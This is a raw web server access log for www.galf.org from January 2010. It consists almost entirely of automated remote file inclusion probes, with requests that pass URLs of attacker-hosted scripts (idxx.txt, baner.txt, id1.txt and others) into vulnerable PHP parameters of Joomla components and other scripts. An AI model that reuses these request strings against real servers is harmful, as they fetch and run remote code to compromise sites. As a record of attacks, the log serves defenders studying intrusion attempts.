85.17.199.105 - - [17/Jan/2010:22:22:06 -0800] "GET /logs/access_090921.log/joomla/index.php?option=com_restaurante&task=http://ambiancefairepart.com//bash/baner.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
85.17.199.105 - - [17/Jan/2010:22:22:07 -0800] "GET /logs/access_090921.log/joomla/index.php?option=com_restaurante&task=http://www.luomoeillegno.com/extras/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
85.17.199.105 - - [17/Jan/2010:22:22:07 -0800] "GET /logs/access_090907.log/joomla/index.php?option=com_restaurante&task=http://www.luomoeillegno.com/extras/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
85.17.199.105 - - [17/Jan/2010:22:22:07 -0800] "GET /logs/access_090907.log/joomla/index.php?option=com_restaurante&task=http://ambiancefairepart.com//bash/baner.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
85.17.199.105 - - [17/Jan/2010:22:22:07 -0800] "GET /logs/access_090921.log/joomla/index.php?option=com_restaurante&task=http://ambiancefairepart.com//bash/baner.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.235.54.152 - - [17/Jan/2010:22:22:09 -0800] "GET /logs/joomla/index.php?option=com_restaurante&task=http://ambiancefairepart.com//bash/baner.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.235.54.152 - - [17/Jan/2010:22:22:09 -0800] "GET /logs/access_090921.log/joomla/index.php?option=com_restaurante&task=http://ambiancefairepart.com//bash/baner.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.235.54.152 - - [17/Jan/2010:22:22:09 -0800] "GET /joomla/index.php?option=com_restaurante&task=http://ambiancefairepart.com//bash/baner.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.235.54.152 - - [17/Jan/2010:22:22:10 -0800] "GET /logs/access_090907.log/joomla/index.php?option=com_restaurante&task=http://ambiancefairepart.com//bash/baner.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.235.54.152 - - [17/Jan/2010:22:22:15 -0800] "GET /joomla/index.php?option=com_restaurante&task=http://ambiancefairepart.com//bash/baner.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.235.54.152 - - [17/Jan/2010:22:22:15 -0800] "GET /logs/access_090921.log%20%20/joomla/index.php?option=com_restaurante&task=http://ambiancefairepart.com//bash/baner.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.235.54.152 - - [17/Jan/2010:22:22:16 -0800] "GET /logs/access_090907.log%20%20/joomla/index.php?option=com_restaurante&task=http://ambiancefairepart.com//bash/baner.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.235.54.152 - - [17/Jan/2010:22:22:16 -0800] "GET /logs/joomla/index.php?option=com_restaurante&task=http://ambiancefairepart.com//bash/baner.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.235.54.152 - - [17/Jan/2010:22:22:16 -0800] "GET /logs/access_090921.log%20%20/joomla/index.php?option=com_restaurante&task=http://www.luomoeillegno.com/extras/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.235.54.152 - - [17/Jan/2010:22:22:16 -0800] "GET /logs/joomla/index.php?option=com_restaurante&task=http://www.luomoeillegno.com/extras/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.235.54.152 - - [17/Jan/2010:22:22:17 -0800] "GET /logs/access_090907.log%20%20/joomla/index.php?option=com_restaurante&task=http://www.luomoeillegno.com/extras/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.235.54.152 - - [17/Jan/2010:22:22:19 -0800] "GET /joomla/index.php?option=com_restaurante&task=http://www.luomoeillegno.com/extras/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.235.54.152 - - [17/Jan/2010:22:22:19 -0800] "GET /logs/joomla/index.php?option=com_restaurante&task=http://www.luomoeillegno.com/extras/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.235.54.152 - - [17/Jan/2010:22:22:20 -0800] "GET /joomla/index.php?option=com_restaurante&task=http://acolmi.org/images/save.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.235.54.152 - - [17/Jan/2010:22:22:20 -0800] "GET /logs/access_090907.log/joomla/index.php?option=com_restaurante&task=http://www.luomoeillegno.com/extras/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.235.54.152 - - [17/Jan/2010:22:22:20 -0800] "GET /logs/access_090921.log/joomla/index.php?option=com_restaurante&task=http://www.luomoeillegno.com/extras/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.235.54.152 - - [17/Jan/2010:22:22:20 -0800] "GET /logs/joomla/index.php?option=com_restaurante&task=http://acolmi.org/images/save.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.235.54.152 - - [17/Jan/2010:22:22:21 -0800] "GET /logs/access_090907.log/joomla/index.php?option=com_restaurante&task=http://acolmi.org/images/save.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.235.54.152 - - [17/Jan/2010:22:22:21 -0800] "GET /logs/access_090921.log/joomla/index.php?option=com_restaurante&task=http://acolmi.org/images/save.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
85.17.199.105 - - [17/Jan/2010:22:22:22 -0800] "GET /logs/access_090615.log/joomla/index.php?option=com_restaurante&task=http://ambiancefairepart.com//bash/baner.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
85.17.199.105 - - [17/Jan/2010:22:22:22 -0800] "GET /logs/access_090615.log/joomla/index.php?option=com_restaurante&task=http://ambiancefairepart.com//bash/baner.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
85.17.199.105 - - [17/Jan/2010:22:22:23 -0800] "GET /logs/access_090615.log/joomla/index.php?option=com_restaurante&task=http://ambiancefairepart.com//bash/baner.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
85.17.199.105 - - [17/Jan/2010:22:22:23 -0800] "GET /logs/access_090615.log/joomla/index.php?option=com_restaurante&task=http://ambiancefairepart.com//bash/baner.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
85.17.199.105 - - [17/Jan/2010:22:22:24 -0800] "GET /logs/access_090615.log/joomla/index.php?option=com_restaurante&task=http://ambiancefairepart.com//bash/baner.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
85.17.199.105 - - [17/Jan/2010:22:22:27 -0800] "GET /logs/access_091102.log/joomla/index.php?option=com_restaurante&task=http://ambiancefairepart.com//bash/baner.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
85.17.199.105 - - [17/Jan/2010:22:22:28 -0800] "GET /logs/access_091102.log/joomla/index.php?option=com_restaurante&task=http://ambiancefairepart.com//bash/baner.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
85.17.199.105 - - [17/Jan/2010:22:22:28 -0800] "GET /logs/access_091102.log/joomla/index.php?option=com_restaurante&task=http://ambiancefairepart.com//bash/baner.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
85.17.199.105 - - [17/Jan/2010:22:22:29 -0800] "GET /logs/access_091102.log/joomla/index.php?option=com_restaurante&task=http://ambiancefairepart.com//bash/baner.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
85.17.199.105 - - [17/Jan/2010:22:22:30 -0800] "GET /logs/access_091102.log/joomla/index.php?option=com_restaurante&task=http://ambiancefairepart.com//bash/baner.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.235.54.152 - - [17/Jan/2010:22:22:39 -0800] "GET /logs/access_090921.log%20%20/joomla/index.php?option=com_restaurante&task=http://ambiancefairepart.com//bash/baner.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.235.54.152 - - [17/Jan/2010:22:22:40 -0800] "GET /logs/access_090907.log%20%20/joomla/index.php?option=com_restaurante&task=http://ambiancefairepart.com//bash/baner.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
77.79.246.80 - - [17/Jan/2010:22:22:47 -0800] "GET /logs/access_090907.log/joomla/index.php?option=com_restaurante&task=http://www.luomoeillegno.com/extras/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
77.79.246.80 - - [17/Jan/2010:22:22:47 -0800] "GET /logs/access_090921.log/joomla/index.php?option=com_restaurante&task=http://www.luomoeillegno.com/extras/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
71.6.189.153 - - [17/Jan/2010:22:22:48 -0800] "GET /logs/access_090928.log/home.php?pagina=http://conexionw.com/editor/idbrac.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
85.17.199.105 - - [17/Jan/2010:22:22:53 -0800] "GET /logs/access_090615.log/joomla/index.php?option=com_restaurante&task=http://www.luomoeillegno.com/extras/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
85.17.199.105 - - [17/Jan/2010:22:22:58 -0800] "GET /logs/access_091102.log/joomla/index.php?option=com_restaurante&task=http://www.luomoeillegno.com/extras/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.235.54.152 - - [17/Jan/2010:22:23:05 -0800] "GET /logs/access_090921.log%20%20/joomla/index.php?option=com_restaurante&task=http://www.luomoeillegno.com/extras/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.235.54.152 - - [17/Jan/2010:22:23:06 -0800] "GET /logs/access_090907.log%20%20/joomla/index.php?option=com_restaurante&task=http://www.luomoeillegno.com/extras/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.235.54.152 - - [17/Jan/2010:22:23:10 -0800] "GET /logs/access_090921.log%20%20/joomla/index.php?option=com_restaurante&task=http://acolmi.org/images/save.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.235.54.152 - - [17/Jan/2010:22:23:10 -0800] "GET /logs/access_090907.log%20%20/joomla/index.php?option=com_restaurante&task=http://acolmi.org/images/save.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.235.54.152 - - [17/Jan/2010:22:23:28 -0800] "GET /logs/access_090921.log/joomla/index.php?option=com_restaurante&task=http://www.luomoeillegno.com/extras/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.235.54.152 - - [17/Jan/2010:22:23:32 -0800] "GET /logs/access_090907.log/joomla/index.php?option=com_restaurante&task=http://www.luomoeillegno.com/extras/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.235.54.152 - - [17/Jan/2010:22:23:46 -0800] "GET /logs/access_090921.log/joomla/index.php?option=com_restaurante&task=http://ambiancefairepart.com//bash/baner.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.235.54.152 - - [17/Jan/2010:22:23:47 -0800] "GET /logs/access_090907.log/joomla/index.php?option=com_restaurante&task=http://ambiancefairepart.com//bash/baner.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
212.175.5.130 - - [17/Jan/2010:22:23:49 -0800] "GET /logs/joomla/index.php?option=com_restaurante&task=http://articlegallery.us//icon/baner.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
212.175.5.130 - - [17/Jan/2010:22:23:49 -0800] "GET /joomla/index.php?option=com_restaurante&task=http://articlegallery.us//icon/baner.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
212.175.5.130 - - [17/Jan/2010:22:23:49 -0800] "GET /logs/access_090907.log/joomla/index.php?option=com_restaurante&task=http://articlegallery.us//icon/baner.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
212.175.5.130 - - [17/Jan/2010:22:23:49 -0800] "GET /logs/access_090921.log/joomla/index.php?option=com_restaurante&task=http://articlegallery.us//icon/baner.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
201.45.123.132 - - [17/Jan/2010:22:24:17 -0800] "GET /logs/access_090629.log/home.php?pagina=http://conexionw.com/editor/idbrac.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
201.45.123.132 - - [17/Jan/2010:22:24:18 -0800] "GET /home.php?pagina=http://conexionw.com/editor/idbrac.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
201.45.123.132 - - [17/Jan/2010:22:24:18 -0800] "GET /logs/home.php?pagina=http://conexionw.com/editor/idbrac.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
77.79.246.80 - - [17/Jan/2010:22:24:27 -0800] "GET /logs/access_090817.log/joomla/index.php?option=com_restaurante&task=http://www.luomoeillegno.com/extras/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
201.45.123.132 - - [17/Jan/2010:22:24:44 -0800] "GET /logs/access_090928.log/home.php?pagina=http://conexionw.com/editor/idbrac.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
212.175.5.130 - - [17/Jan/2010:22:25:20 -0800] "GET /logs/access_090615.log/joomla/index.php?option=com_restaurante&task=http://articlegallery.us//icon/baner.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
189.72.28.14 - - [17/Jan/2010:22:26:33 -0800] "GET /?sourcedir=http://www.johngarzon.com.co//list/id1.txt??? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
212.175.5.130 - - [17/Jan/2010:22:26:33 -0800] "GET /logs/access_091102.log/joomla/index.php?option=com_restaurante&task=http://articlegallery.us//icon/baner.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
189.72.28.14 - - [17/Jan/2010:22:26:35 -0800] "GET /logs/access_090921.log/?sourcedir=http://www.johngarzon.com.co//list/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
189.72.28.14 - - [17/Jan/2010:22:26:35 -0800] "GET /logs/?sourcedir=http://www.johngarzon.com.co//list/id1.txt??? HTTP/1.1" 200 4799 "-" "Mozilla/5.0" "www.galf.org"
189.72.28.14 - - [17/Jan/2010:22:27:47 -0800] "GET /logs/access_090907.log/?sourcedir=http://www.johngarzon.com.co//list/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
189.72.28.14 - - [17/Jan/2010:22:27:47 -0800] "GET /logs/access_090615.log/?sourcedir=http://www.johngarzon.com.co//list/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [17/Jan/2010:22:28:30 -0800] "GET /logs//agendax/addevent.inc.php?agendax_path=http://www.hotelmoulin.com/db/icon/a.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [17/Jan/2010:22:28:30 -0800] "GET /logs/access_100111.log%20%20//agendax/addevent.inc.php?agendax_path=http://www.hotelmoulin.com/db/icon/a.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [17/Jan/2010:22:28:30 -0800] "GET /agendax/addevent.inc.php?agendax_path=http://www.hotelmoulin.com/db/icon/a.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [17/Jan/2010:22:28:30 -0800] "GET /logs//agendax/addevent.inc.php?agendax_path=http://www.hotelmoulin.com/db/icon/a.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [17/Jan/2010:22:28:30 -0800] "GET /agendax/addevent.inc.php?agendax_path=http://www.hotelmoulin.com/db/icon/a.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [17/Jan/2010:22:28:30 -0800] "GET /logs/access_100111.log%20%20//agendax/addevent.inc.php?agendax_path=http://www.hotelmoulin.com/db/icon/a.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [17/Jan/2010:22:28:31 -0800] "GET /agendax/addevent.inc.php?agendax_path=http://www.hotelmoulin.com/db/icon/a.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [17/Jan/2010:22:28:31 -0800] "GET /logs//agendax/addevent.inc.php?agendax_path=http://www.hotelmoulin.com/db/icon/a.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [17/Jan/2010:22:28:32 -0800] "GET /logs/access_100111.log%20%20//agendax/addevent.inc.php?agendax_path=http://www.hotelmoulin.com/db/icon/a.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
189.72.28.14 - - [17/Jan/2010:22:30:21 -0800] "GET /logs/access_090907.log/?sourcedir=http://www.johngarzon.com.co//list/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
189.72.28.14 - - [17/Jan/2010:22:30:21 -0800] "GET /?sourcedir=http://www.johngarzon.com.co//list/id1.txt??? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
189.72.28.14 - - [17/Jan/2010:22:30:21 -0800] "GET /logs/access_090615.log/?sourcedir=http://www.johngarzon.com.co//list/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
189.72.28.14 - - [17/Jan/2010:22:30:21 -0800] "GET /logs/access_090622.log/?sourcedir=http://www.johngarzon.com.co//list/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
189.72.28.14 - - [17/Jan/2010:22:30:21 -0800] "GET /logs/?sourcedir=http://www.johngarzon.com.co//list/id1.txt??? HTTP/1.1" 200 4799 "-" "Mozilla/5.0" "www.galf.org"
189.72.28.14 - - [17/Jan/2010:22:30:21 -0800] "GET /logs/access_090720.log/?sourcedir=http://www.johngarzon.com.co//list/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
189.72.28.14 - - [17/Jan/2010:22:30:21 -0800] "GET /logs/access_090810.log/?sourcedir=http://www.johngarzon.com.co//list/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
189.72.28.14 - - [17/Jan/2010:22:30:57 -0800] "GET /logs/access_090907.log%20%20/?sourcedir=http://www.johngarzon.com.co//list/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
189.72.28.14 - - [17/Jan/2010:22:32:01 -0800] "GET /logs/access_090907.log%20%20/?sourcedir=http://www.johngarzon.com.co//list/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.223.143.131 - - [17/Jan/2010:22:34:16 -0800] "GET /errors.php?error=http://loja.astrofoto.com.pt/components/com_putek/news/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.223.143.131 - - [17/Jan/2010:22:34:16 -0800] "GET /logs/errors.php?error=http://loja.astrofoto.com.pt/components/com_putek/news/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.223.143.131 - - [17/Jan/2010:22:34:17 -0800] "GET /logs/access_090921.log%20%20/errors.php?error=http://loja.astrofoto.com.pt/components/com_putek/news/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
189.72.28.14 - - [17/Jan/2010:22:34:18 -0800] "GET /logs/access_090907.log%20%20/?sourcedir=http://www.johngarzon.com.co//list/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
189.72.28.14 - - [17/Jan/2010:22:34:19 -0800] "GET /logs/access_091102.log%20%20/?sourcedir=http://www.johngarzon.com.co//list/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.223.143.131 - - [17/Jan/2010:22:34:30 -0800] "GET /errors.php?error=http://loja.astrofoto.com.pt/components/com_putek/news/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.223.143.131 - - [17/Jan/2010:22:34:30 -0800] "GET /logs/errors.php?error=http://loja.astrofoto.com.pt/components/com_putek/news/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.223.143.131 - - [17/Jan/2010:22:34:30 -0800] "GET /logs/access_090921.log%20%20/errors.php?error=http://loja.astrofoto.com.pt/components/com_putek/news/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.223.143.131 - - [17/Jan/2010:22:35:08 -0800] "GET /logs/access_090907.log%20%20/errors.php?error=http://loja.astrofoto.com.pt/components/com_putek/news/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.223.143.131 - - [17/Jan/2010:22:35:31 -0800] "GET /logs/access_090907.log%20%20/errors.php?error=http://loja.astrofoto.com.pt/components/com_putek/news/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
189.72.28.14 - - [17/Jan/2010:22:35:37 -0800] "GET /logs/access_091102.log%20%20/?sourcedir=http://www.johngarzon.com.co//list/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
189.72.28.14 - - [17/Jan/2010:22:36:42 -0800] "GET /logs/access_091102.log%20%20/?sourcedir=http://www.johngarzon.com.co//list/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
189.72.28.14 - - [17/Jan/2010:22:37:14 -0800] "GET /logs/access.log%20%20/?sourcedir=http://www.johngarzon.com.co//list/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.223.143.131 - - [17/Jan/2010:22:37:31 -0800] "GET /logs/access_090921.log/errors.php?error=http://loja.astrofoto.com.pt/components/com_putek/news/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.223.143.131 - - [17/Jan/2010:22:37:31 -0800] "GET /logs/errors.php?error=http://loja.astrofoto.com.pt/components/com_putek/news/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.223.143.131 - - [17/Jan/2010:22:37:32 -0800] "GET /errors.php?error=http://loja.astrofoto.com.pt/components/com_putek/news/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.223.143.131 - - [17/Jan/2010:22:37:38 -0800] "GET /logs/errors.php?error=http://loja.astrofoto.com.pt/components/com_putek/news/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.223.143.131 - - [17/Jan/2010:22:37:41 -0800] "GET /errors.php?error=http://loja.astrofoto.com.pt/components/com_putek/news/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.223.143.131 - - [17/Jan/2010:22:37:41 -0800] "GET /logs/access_090921.log/errors.php?error=http://loja.astrofoto.com.pt/components/com_putek/news/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.223.143.131 - - [17/Jan/2010:22:38:08 -0800] "GET /logs/access_090907.log/errors.php?error=http://loja.astrofoto.com.pt/components/com_putek/news/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
189.72.28.14 - - [17/Jan/2010:22:38:10 -0800] "GET /logs/access_090629.log%20%20/?sourcedir=http://www.johngarzon.com.co//list/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
189.72.28.14 - - [17/Jan/2010:22:38:21 -0800] "GET /logs/access.log%20%20/?sourcedir=http://www.johngarzon.com.co//list/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.223.143.131 - - [17/Jan/2010:22:38:26 -0800] "GET /logs/access_090907.log/errors.php?error=http://loja.astrofoto.com.pt/components/com_putek/news/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
189.72.28.14 - - [17/Jan/2010:22:38:41 -0800] "GET /logs/access.log%20%20/?sourcedir=http://www.johngarzon.com.co//list/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
65.55.106.163 - - [17/Jan/2010:22:39:07 -0800] "GET /labia/?N=A HTTP/1.1" 200 524 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "www.galf.org"
189.72.28.14 - - [17/Jan/2010:22:39:17 -0800] "GET /logs/access_090914.log%20%20/?sourcedir=http://www.johngarzon.com.co//list/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
189.72.28.14 - - [17/Jan/2010:22:39:23 -0800] "GET /logs/access_090720.log%20%20/?sourcedir=http://www.johngarzon.com.co//list/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
189.72.28.14 - - [17/Jan/2010:22:40:40 -0800] "GET /logs/access_090914.log%20%20/?sourcedir=http://www.johngarzon.com.co//list/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
189.72.28.14 - - [17/Jan/2010:22:41:34 -0800] "GET /logs/access_091026.log%20%20/?sourcedir=http://www.johngarzon.com.co//list/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
189.72.28.14 - - [17/Jan/2010:22:41:36 -0800] "GET /logs/access_090720.log%20%20/?sourcedir=http://www.johngarzon.com.co//list/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.62.128.254 - - [17/Jan/2010:22:42:26 -0800] "GET /administrator/components/com_chronocontact/excelwriter/Writer.php?mosConfig_absolute_path=http://210.205.6.168/~shop/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.62.128.254 - - [17/Jan/2010:22:42:26 -0800] "GET /logs/administrator/components/com_chronocontact/excelwriter/Writer.php?mosConfig_absolute_path=http://210.205.6.168/~shop/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.62.128.254 - - [17/Jan/2010:22:42:26 -0800] "GET /logs/access_090824.log/administrator/components/com_chronocontact/excelwriter/Writer.php?mosConfig_absolute_path=http://210.205.6.168/~shop/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
189.72.28.14 - - [17/Jan/2010:22:42:34 -0800] "GET /logs/access_091214.log%20%20/?sourcedir=http://www.johngarzon.com.co//list/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
189.72.28.14 - - [17/Jan/2010:22:42:46 -0800] "GET /logs/access_090720.log%20%20/?sourcedir=http://www.johngarzon.com.co//list/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
189.72.28.14 - - [17/Jan/2010:22:43:59 -0800] "GET /logs/?sourcedir=http://www.johngarzon.com.co//list/id1.txt??? HTTP/1.1" 200 4799 "-" "Mozilla/5.0" "www.galf.org"
189.72.28.14 - - [17/Jan/2010:22:43:59 -0800] "GET /?sourcedir=http://www.johngarzon.com.co//list/id1.txt??? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
189.72.28.14 - - [17/Jan/2010:22:43:59 -0800] "GET /logs/access_090921.log/?sourcedir=http://www.johngarzon.com.co//list/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
189.72.28.14 - - [17/Jan/2010:22:43:59 -0800] "GET /logs/access_090615.log/?sourcedir=http://www.johngarzon.com.co//list/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
189.72.28.14 - - [17/Jan/2010:22:43:59 -0800] "GET /logs/access_090907.log/?sourcedir=http://www.johngarzon.com.co//list/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
189.72.28.14 - - [17/Jan/2010:22:44:56 -0800] "GET /logs/access_090622.log/?sourcedir=http://www.johngarzon.com.co//list/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
189.72.28.14 - - [17/Jan/2010:22:45:04 -0800] "GET /logs/access_091026.log%20%20/?sourcedir=http://www.johngarzon.com.co//list/id1.txt??? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.62.128.254 - - [17/Jan/2010:22:45:08 -0800] "GET /logs/access_091228.log/administrator/components/com_chronocontact/excelwriter/Writer.php?mosConfig_absolute_path=http://210.205.6.168/~shop/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
189.72.28.14 - - [17/Jan/2010:22:45:35 -0800] "GET /logs/access_091026.log%20%20/?sourcedir=http://www.johngarzon.com.co//list/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
189.72.28.14 - - [17/Jan/2010:22:45:55 -0800] "GET /logs/access_090921.log%20%20/?sourcedir=http://www.johngarzon.com.co//list/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
